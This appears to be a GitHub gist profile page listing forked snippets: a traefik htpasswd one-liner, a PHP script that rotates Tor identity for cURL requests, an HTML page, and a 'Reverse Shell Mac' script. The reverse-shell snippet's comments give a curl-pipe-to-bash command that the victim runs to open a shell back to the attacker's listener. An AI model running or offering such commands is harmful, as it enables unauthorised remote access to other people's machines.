Skip to content

Instantly share code, notes, and snippets.

View zxcvbinz's full-sized avatar
🐳
docker-compose up --build

zxcvbinz zxcvbinz

🐳
docker-compose up --build
View GitHub Profile
@zxcvbinz
zxcvbinz / traefik basic auth htpasswd
Created November 27, 2023 13:42 — forked from marcometz/traefik basic auth htpasswd
user and password generator for traefik basic auth middleware
traefik.frontend.auth.basic.users:
echo $(htpasswd -nbB username "passwort") | sed -e s/\\$/\\$\\$/g
@zxcvbinz
zxcvbinz / reverse-shell.sh
Created January 29, 2022 20:41 — forked from mattes/reverse-shell.sh
Reverse Shell Mac
#!/usr/bin/env bash
# run `nc -nvl 80` on attacker machine first
# run `curl -Ls https://git.io/vXd2N | bash -s <attacker-ip> 80` on victim machine
# great commands to run:
# * curl http://discovermagazine.com/~/media/import/images/b/e/b/chimpmedia.jpg -o /tmp/monkey.jpg
# open /tmp/monkey.jpg
# * say hello
# * open http://lmgtfy.com/?q=how+to+lock+mac
# * ls
@zxcvbinz
zxcvbinz / tor_curl.php
Created July 5, 2021 17:23 — forked from zachflower/tor_curl.php
How To Anonymize PHP cURL Requests Using Tor
<?php
$ip = '127.0.0.1';
$port = '9051';
$auth = 'PASSWORD';
$command = 'signal NEWNYM';
$fp = fsockopen($ip,$port,$error_number,$err_string,10);
if(!$fp) { echo "ERROR: $error_number : $err_string";
return false;
@zxcvbinz
zxcvbinz / index.html
Last active August 8, 2018 18:11
Word Places
<html>
<head>
<link href="style.css" rel="stylesheet">
</head>
<body>
<h1> 3 World places to visit this new year</h1>
<div class="wrapper">
<div class="container" id="c0">
<div class="image" id="i0">